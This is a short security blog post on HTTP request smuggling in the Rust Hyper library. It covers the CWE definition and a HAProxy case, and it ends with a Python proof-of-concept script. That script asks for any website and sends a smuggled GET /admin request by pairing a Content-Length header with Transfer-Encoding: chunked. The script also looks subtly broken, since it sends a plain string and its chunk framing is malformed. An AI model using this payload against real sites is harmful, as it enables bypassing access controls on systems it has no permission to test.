Rust Hyper Request smuggling

firosolutions (38)in #security • 4 years ago

The exploit of the day is a request smuggling vulnerability found in the HTTP Rust library Hyper.

Firo Solutions request smuggling
Request Smuggling
Request smuggling is sending 2 requests inside one payload so normally you would go to the website and one request is sent
but with request smuggling you send 1 payload of data and fool the server that the request is 2 different request instead of one.
This method of attacking got very popular after affecting the popular HAProxy and the great security researcher https://twitter.com/albinowax
published a blog post talking about it.
HTTP smuggling has affected a lot of software like:
Netty
CVE-2020–7238
https://github.com/jdordonezn/CVE-2020-72381/issues/1
Apache tomcat
Nginx
HAProxy
Waitress
Gitlab
And many more even squid.
It even got a CWE(Common Weakness Enumeration) definition: “When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to “smuggle” a request to one device without the other device being aware of it.” https://cwe.mitre.org/data/definitions/444.html
An interesting discovery was found in the hyper HTTP crate.
It’s a simple bug the client that handles the “transfer-encoding: chunked” part of the
GET request wrongly.
HAProxy
Nathan Davison reported a vulnerability in HAProxy:
Nathan Davison (@ndavison) reported that in legacy mode we didn't correctly
rejected messages featuring a transfer-encoding header missing the "chunked"
value. The impact was limited, but if combined with "http-reuse always", it
could be used as an help to construct a content smuggling attack against a
vulnerable component employing a lenient parser which would ignore the
content-length header as soon as it sees a transfer-encoding one, without even
parsing it.
He then wrote a blog post about using HAProxy as a load balancer and a python flask backend
then by exploiting that HAProxy doesnt reject the bad “Transfer-Encoding: chunked” messages
was able to cause a http-smuggling attack.
https://nathandavison.com/blog/haproxy-http-request-smuggling https://www.mail-archive.com/[email protected]/msg34926.html

Poc example exploit

import socket 
website = input('gime website:')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((website, 80))
stuff = """
GET /stuff HTTP/1.1
Host: {}
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: {}
Foo: xGET /home HTTP/1.1
Host: {}
""".format(website, website, website)
s.sendall(stuff)
response = s.recv(1024) # change if needed 
print('got back: ', response)